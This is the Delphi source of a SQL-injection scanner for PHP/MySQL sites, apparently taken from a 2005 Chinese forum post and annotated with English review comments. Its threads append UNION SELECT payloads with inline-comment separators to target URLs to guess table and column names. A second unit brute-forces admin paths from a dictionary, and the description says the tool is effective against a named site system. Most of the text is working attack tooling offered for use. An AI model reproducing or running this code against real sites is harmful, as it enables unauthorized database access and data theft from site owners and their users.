nbsp; begin FState :=True; FMemo.Lines.Add(''''''''); FMemo.Lines.Add(''''字段数目猜解结束!共找到''''+IntToStr(i)+''''个字段。''''); Form1.EdtFieldNum.Text :=IntToStr(i); Form1.spNum.MaxValue :=i; Form1.spNum.Text :=IntToStr(i); Form1.spField1.MaxValue :=i; Form1.spField2.MaxValue :=i; exit; end; end; end;
{ Stores the scan parameters on the thread object and starts the thread.
  Url      - base URL the probe string is appended to (see Execute)
  Str      - column list placed after "select" in the probe
  KeyWord  - marker passed to Get() to decide whether a probe matched
  Memo     - memo control that receives the log lines
  ListView - list view that receives one row per match }
constructor scanTableThread.Create(Url, Str, KeyWord: String; Memo: TMemo; ListView: TListView);
begin
  FUrl := Url;
  FStr := Str;
  FKeyWord := KeyWord;
  FMemo := Memo;
  FListView := ListView;
  { The thread object frees itself once Execute returns. }
  FreeOnTerminate := True;
  { NOTE(review): CS is initialised on every construction. If CS is shared
    between thread objects (its declaration is not visible here), it should
    be initialised once, e.g. in the unit's initialization section, because
    re-initialising a critical section that is in use is undefined. }
  InitializeCriticalSection(CS);
  { False = not created suspended. }
  inherited Create(False);
end;
{ Appends one row to the result list view: the caption is the running row
  number, the first sub-item is the name held in FValue.
  Called through Synchronize from Execute, so it runs on the main thread. }
procedure scanTableThread.scanTableResult;
var
  Row: TListItem;
begin
  Row := FListView.Items.Add;
  { Count is read after the row was added, so numbering starts at 1. }
  Row.Caption := IntToStr(FListView.Items.Count);
  Row.SubItems.Add(FValue);
end;
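{ Performs the table-name guessing in a single thread.
  For every non-empty entry of Form1.lsbDict one URL is built from FUrl, FStr
  and the entry, logged to FMemo and handed to Get(); when Get() returns True
  the entry is added to the list view through Synchronize.

  Each probe's URL ends in the literal text
  /**/and/**/1=1/**/union/**/select/**/<FStr>/**/from/**/<entry>/*
  so a run shows up in web-server access logs as a burst of requests that
  carry inline-comment separators and a trailing "/*" in the query string,
  one request per dictionary entry.

  Changes against the page's listing: line breaks restored (the collapsed
  "//" comments swallowed the statements after them), the doubled quote
  escaping undone, and the critical section released in a finally block.
  The listing left the section locked when the stop flag ended the loop. }
procedure scanTableThread.Execute;
var
  i: Integer;
begin
  stoped := False;
  { NOTE(review): Form1's controls and FMemo are touched directly from the
    worker thread here and below; only the list-view update goes through
    Synchronize. }
  with Form1 do
  begin
    pg1.Min := 0;
    pg1.Max := Form1.lsbDict.Count;
    pg1.Step := 1;
    pg1.Position := 0;
    pg1.Visible := True;
  end;
  EnterCriticalSection(CS);
  try
    FMemo.Lines.Add('');
    FMemo.Lines.Add('开始猜解表段。。。');
    FMemo.Lines.Add('');
    for i := 0 to Form1.lsbDict.Count - 1 do
    begin
      { stoped is set elsewhere; leaving the loop falls through to the same
        closing log lines the listing printed before its early exit. }
      if stoped then
        Break;
      { The page shows "lsbDict.Items" without a subscript, which does not
        type-check; the "[i]" was presumably lost when the page was rendered.
        scanFieldThread.Execute indexes the same list with Items[FNum]. }
      FValue := Form1.lsbDict.Items[i];
      if FValue = '' then
        Continue;
      InjUrl := FUrl + '/**/and/**/1=1/**/union/**/select/**/' + FStr +
        '/**/from/**/' + FValue + '/*';
      FMemo.Lines.Add(InjUrl);
      Form1.pg1.StepIt;
      if Get(InjUrl, FKeyWord) then
        Synchronize(scanTableResult);
    end;
    FMemo.Lines.Add('');
    FMemo.Lines.Add('表段猜解结束。。。');
    Form1.pg1.Visible := False;
  finally
    LeaveCriticalSection(CS);
  end;
  Sleep(20);
end;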
{ Column-name guessing is spread over several threads; each thread object
  handles one dictionary entry.
  Url      - base URL the probe string is appended to (see Execute)
  Str      - column list template; Execute replaces &FIELDNAME& in it
  KeyWord  - marker passed to Get() to decide whether a probe matched
  Table    - table name placed after "from" in the probe
  Num      - index of the dictionary entry this thread tests
  Memo     - memo control that receives the log lines
  ListView - list view that receives one row per match }
constructor scanFieldThread.Create(Url, Str, KeyWord, Table: String; Num: Integer;
  Memo: TMemo; ListView: TListView);
begin
  FUrl := Url;
  FStr := Str;
  FKeyWord := KeyWord;
  FTable := Table;
  FNum := Num;
  FMemo := Memo;
  FListView := ListView;
  { The thread object frees itself once Execute returns. }
  FreeOnTerminate := True;
  { NOTE(review): every thread object re-initialises CS. With several
    threads alive at once this can reset a critical section another thread
    currently holds; initialising it once per process avoids that. }
  InitializeCriticalSection(CS);
  { False = not created suspended. }
  inherited Create(False);
end;
{ Appends one row to the result list view: the caption is the running row
  number, the first sub-item is the name held in FValue.
  Called through Synchronize from Execute, so it runs on the main thread. }
procedure scanFieldThread.scanFieldResult;
var
  Row: TListItem;
begin
  Row := FListView.Items.Add;
  { Count is read after the row was added, so numbering starts at 1. }
  Row.Caption := IntToStr(FListView.Items.Count);
  Row.SubItems.Add(FValue);
end;
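{ Tests one dictionary entry (index FNum) as a column name of FTable.
  The &FIELDNAME& placeholder in FStr is replaced by the entry, the probe
  URL is built, logged to FMemo and handed to Get(); when Get() returns True
  the entry is added to the list view through Synchronize.

  The probe's URL ends in the literal text
  /**/and/**/1=1/**/union/**/select/**/<columns>/**/from/**/<FTable>/*
  which is the same access-log signature the table-name scan produces.

  Changes against the page's listing: line breaks restored, the doubled
  quote escaping undone, the unused local i removed, and the critical
  section released in a finally block so an exception in Get() or in the
  memo update cannot leave it locked for the other threads. }
procedure scanFieldThread.Execute;
var
  TmpStr: string;
begin
  FValue := Form1.lsbDict.Items[FNum];
  { StringReplace without rfReplaceAll substitutes the first occurrence only. }
  TmpStr := StringReplace(FStr, '&FIELDNAME&', FValue, [rfIgnoreCase]);
  EnterCriticalSection(CS);
  try
    { InjUrl's declaration is not visible here; building it inside the lock
      keeps it consistent even if it turns out to be shared between threads. }
    InjUrl := FUrl + '/**/and/**/1=1/**/union/**/select/**/' + TmpStr +
      '/**/from/**/' + FTable + '/*';
    FMemo.Lines.Add(InjUrl);
    if Get(InjUrl, FKeyWord) then
      Synchronize(scanFieldResult);
  finally
    LeaveCriticalSection(CS);
  end;
  Sleep(20);
end;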
end.
//后台管理扫描线程类 unit Unit3;
interface
uses Classes,StdCtrls,Windows,SysUtils,ComCtrls,wininet;
var CS:TRTLCriticalSection; //定义全局临界区
{ Worker thread that probes one candidate path: the base URL plus one entry
  of Form1.lsbDict (see Execute). }
type scanManagerThread = class(TThread)
  private
    Tmplbx :TListBox;   // list box that receives the URLs CheckUrl accepted
    TmpMemo :TMemo;     // memo that receives every URL that is probed
    TmpNum :integer;    // index into Form1.lsbDict.Items for this thread
    TmpUrl :string;     // base URL the dictionary entry is appended to
    Str :string;        // full URL built in Execute
    procedure scanResult;   // adds Str to Tmplbx and updates the counter caption
  protected
    procedure Execute; override;
  public
    constructor Create(Url:string; Num: integer;Lbx: TListBox;Memo:TMemo);
  end;
implementation
uses Unit1;
{ Stores the probe parameters on the thread object and starts the thread.
  Url  - base URL the dictionary entry is appended to
  Num  - index of the dictionary entry this thread probes
  Lbx  - list box that receives the URLs that were found
  Memo - memo control that receives the log lines }
constructor scanManagerThread.Create(Url: string; Num: Integer; Lbx: TListBox; Memo: TMemo);
begin
  TmpMemo := Memo;
  Tmplbx := Lbx;
  TmpNum := Num;
  TmpUrl := Url;
  { The thread object frees itself once Execute returns. }
  FreeOnTerminate := True;
  { NOTE(review): CS is a unit-level variable shared by every thread object,
    yet it is initialised again on each construction. Re-initialising a
    critical section that another thread holds is undefined; it belongs in
    the unit's initialization section. }
  InitializeCriticalSection(CS);
  { False = not created suspended. }
  inherited Create(False);
end;
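//====================== Checks whether a URL exists =======================
{ Requests url through WinInet and reports whether the server answered with
  a status outside 400..450.
  url     - address to request; "http://" is prepended when the text
            "http://" does not occur in it
  TimeOut - connect timeout in milliseconds
  Returns True when a response arrived and its status code is not in
  400..450; False when the session or the request could not be opened, or
  when the status is in 400..450.

  Every request carries the fixed User-Agent "Mozilla/4.0".

  Fixes against the page's listing:
  - InternetSetOption ran on hSession before InternetOpen had assigned it;
    the timeout is now set on the opened session.
  - "(Err1 <> 12002) or (Err1 <> 12152)" is always true, so the retry loop
    never retried; the test now uses "and".
  - HttpQueryInfo was called even when the request handle was nil and then
    parsed an uninitialised buffer; a failed request now returns False.
  - Both handles are closed in finally blocks.
  NOTE(review): a URL that starts with "https://" does not contain
  "http://" and therefore still gets the prefix prepended. }
function CheckUrl(url: string; TimeOut: integer = 5000): boolean;
const
  MAX_ATTEMPTS = 5;
  ERR_TIMEOUT = 12002;            // ERROR_INTERNET_TIMEOUT
  ERR_INVALID_RESPONSE = 12152;   // ERROR_HTTP_INVALID_SERVER_RESPONSE
var
  hSession, hFile: HINTERNET;
  dwIndex, dwCodeLen: DWORD;
  dwCode: array[1..20] of Char;
  Status, LastErr, Attempt: Integer;
begin
  Result := False;
  if Pos('http://', LowerCase(url)) = 0 then
    url := 'http://' + url;

  hSession := InternetOpen('Mozilla/4.0', INTERNET_OPEN_TYPE_PRECONFIG, nil, nil, 0);
  if not Assigned(hSession) then
    Exit;
  try
    InternetSetOption(hSession, INTERNET_OPTION_CONNECT_TIMEOUT, @TimeOut, SizeOf(TimeOut));

    { Up to MAX_ATTEMPTS tries; only a timeout or an invalid server response
      is worth another attempt. }
    Attempt := 1;
    while True do
    begin
      hFile := InternetOpenUrl(hSession, PChar(url), nil, 0, INTERNET_FLAG_RELOAD, 0);
      if hFile <> nil then
        Break;
      LastErr := GetLastError;
      Inc(Attempt);
      if Attempt > MAX_ATTEMPTS then
        Break;
      if (LastErr <> ERR_TIMEOUT) and (LastErr <> ERR_INVALID_RESPONSE) then
        Break;
      Sleep(2);
    end;
    if hFile = nil then
      Exit;

    try
      { Zero the buffer so a failed query parses as the 404 default. }
      FillChar(dwCode, SizeOf(dwCode), 0);
      dwIndex := 0;
      dwCodeLen := 10;
      HttpQueryInfo(hFile, HTTP_QUERY_STATUS_CODE, @dwCode, dwCodeLen, dwIndex);
      Status := StrToIntDef(PChar(@dwCode), 404);
      Result := not ((Status >= 400) and (Status <= 450));
    finally
      InternetCloseHandle(hFile);
    end;
  finally
    InternetCloseHandle(hSession);
  end;
end;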
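{ Returns the run of spaces that pads str to a width of 50 characters:
  50 - Length(str) spaces, or an empty string when str is already 50
  characters or longer.

  Fixes against the page's listing: Result was appended to without being
  initialised first, and the space literal had its quotes doubled by the
  page's escaping. }
function GetBackSpaceCount(str: string): string;
var
  Pad: Integer;
begin
  Pad := 50 - Length(str);
  if Pad > 0 then
    Result := StringOfChar(' ', Pad)
  else
    Result := '';
end;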
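{ Adds the URL held in Str to the result list box and refreshes the group
  box caption with the number of entries found so far.
  Called through Synchronize from Execute, so it runs on the main thread.
  The only change against the page's listing is the string quoting, which
  the page's escaping had doubled. }
procedure scanManagerThread.scanResult;
begin
  Tmplbx.Items.Add(Str);
  Form1.GroupBox1.Caption := '检测结果:共找到' + IntToStr(Tmplbx.Items.Count) + '条路径';
end;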
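{ Probes one candidate path: TmpUrl plus dictionary entry TmpNum.
  The URL is logged to TmpMemo and passed to CheckUrl; when CheckUrl returns
  True the URL is added to the list box through Synchronize.

  Changes against the page's listing: line breaks restored (the collapsed
  "//" comments swallowed the statements after them) and the critical
  section released in a finally block, so an exception between Enter and
  Leave cannot leave it locked for the other threads.
  NOTE(review): the whole probe runs inside the shared critical section, so
  the threads execute their requests one after another. }
procedure scanManagerThread.Execute;
begin
  Str := TmpUrl + Form1.lsbDict.Items[TmpNum];
  EnterCriticalSection(CS);
  try
    TmpMemo.Lines.Add(Str);
    if CheckUrl(Str) then
      Synchronize(scanResult);
  finally
    LeaveCriticalSection(CS);
  end;
end;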
end.
简介:PHP+MYSQL网站注入扫描工具,针对类似夜猫文章下载系统比较有效,界面是仿教程的hdsi中的PHP注入模块写的,实现原理是参考angel的SQL Injection with MYSQL 写的,网上有很多,不再细说。 界面截图:http://www.wrsky.com/attachment/3_1891.jpg 源码下载:http://downloads.2ccc.com/general/internet_lan/PHPInj.rar
Author: hnxyy QQ: 19026695 Date: 2005/5/25
FireFox技术交流论坛 http://www.wrsky.com It is all beginnings free It is all ruin to be privately owned 使用D7编写,界面比较难看,和教主的工具对比了一下,感觉比他的工作扫描速度要快很多
主要单元代码:
unit Unit1;
interface
uses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, Spin, StdCtrls, ComCtrls, Buttons, ExtCtrls, IDHTTP, unit2, Unit3, OleCtrls, SHDocVw;
type TForm1 = class(TForm) Panel8: TPanel; Label15: TLabel; Label16: TLabel; Label17: TLabel; EdtInjUrl: TEdit; EdtKey: TEdit; EdtFieldNum: TEdit; rdbNum: TRadioButton; rdbChar: TRadioButton; Panel1: TPanel; pcPHPInj: TPageControl; TabSheet1: TTabSheet; sbscan1: TSpeedButton; sbstop1: TSpeedButton; sbscan2: TSpeedButton; sbstop2: TSpeedButton; Panel15: TPanel; GroupBox5: TGroupBox; lvTable: TListView; GroupBox6: TGroupBox; lvField: TListView; TabSheet2: TTabSheet; GroupBox7: TGroupBox; Label18: TLabel; Label19: TLabel; Label20: TLabel; Label21: TLabel; spField1: TSpinEdit; spField2: TSpinEdit; EdtField1: TEdit; EdtField2: TEdit; EdtTable: TEdit; EdtID: TEdit; GroupBox8: TGroupBox; Label22: TLabel; EdtFileName: TEdit; sbrecord: TSpeedButton; sbfile: TSpeedButton; MM: TMemo; sbscan: TSpeedButton; TabSheet3: TTabSheet; lsbDict: TListBox; TabSheet4: TTabSheet; wb: TWebBrowser; spNum: TSpinEdit; GroupBox1: TGroupBox; sbscan3: TSpeedButton; sbstop3: TSpeedButton; ListBox1: TListBox; TabSheet5: TTabSheet; MMAbout: TMemo; StatusBar1: TStatusBar; procedure sbscanClick(Sender: TObject); procedure sbstop1Click(Sender: TObject); procedure sbscan1Click(Sender: TObject); procedure sbscan2Click(Sender: TObject); procedure lvFieldClick(Sender: TObject); pro